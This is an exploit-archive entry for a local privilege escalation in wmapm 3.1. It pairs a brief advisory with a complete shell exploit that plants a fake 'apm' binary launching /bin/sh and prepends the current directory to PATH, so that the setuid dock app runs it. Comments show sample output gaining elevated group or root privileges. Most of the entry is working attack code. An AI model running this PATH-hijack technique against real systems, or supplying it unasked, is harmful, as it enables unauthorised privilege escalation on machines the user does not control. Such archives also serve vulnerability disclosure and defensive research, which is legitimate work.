WMAPM 3.1 - Local Privilege Escalation

Author: Knud Erik Hojgaard
type: local
platform: linux
port: 
date_added: 2003-11-08  
date_updated: 2012-12-13  
verified: 1  
codes: OSVDB-2792  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23364.sh  
source: https://www.securityfocus.com/bid/8995/info

wmapm has been reported prone to a local privilege escalation vulnerability. The vulnerability has been conjectured to result from a lack of relative path usage while the vulnerable dock app is invoking a third party binary. As a result of this, a local attacker may manipulate local path settings and have the setuid wmapm dock app erroneously invoke a trojan binary that is located in a directory that the attacker has permissions to write to.

#/bin/sh
# Pretty useless, we can mess up /etc/dumpdates or run shutdown
# on FreeBSD systems with wmapm from ports.
# If wmapm is installed from source we get root instead,
# so I suppose this might be worth something(uid 0) on linux.
# kokanin@dtors~ pkg_info | grep -i wmapm
# wmapm-3.1           Laptop battery status display for WindowMaker
# kokanin@dtors~ ls -la `which wmapm`
# -rwxr-sr-x  1 root  operator  41892 Mar 23 10:00 /usr/X11R6/bin/wmapm
# kokanin@dtors~ sh DSR-wmapm.sh
# press the S button when wmapm starts
# $ /usr/bin/id
# uid=1001(kokanin) gid=1001(kokanin) egid=5(operator) groups=5(operator), 1001(kokanin), 0(wheel), 666(lewsers)
echo "/bin/sh" > apm
chmod +x ./apm
echo "press the S button(not the key, the BUTTON, in the PROGRAM) when wmapm starts"
export PATH=.:$PATH
/usr/X11R6/bin/wmapm
rm ./apm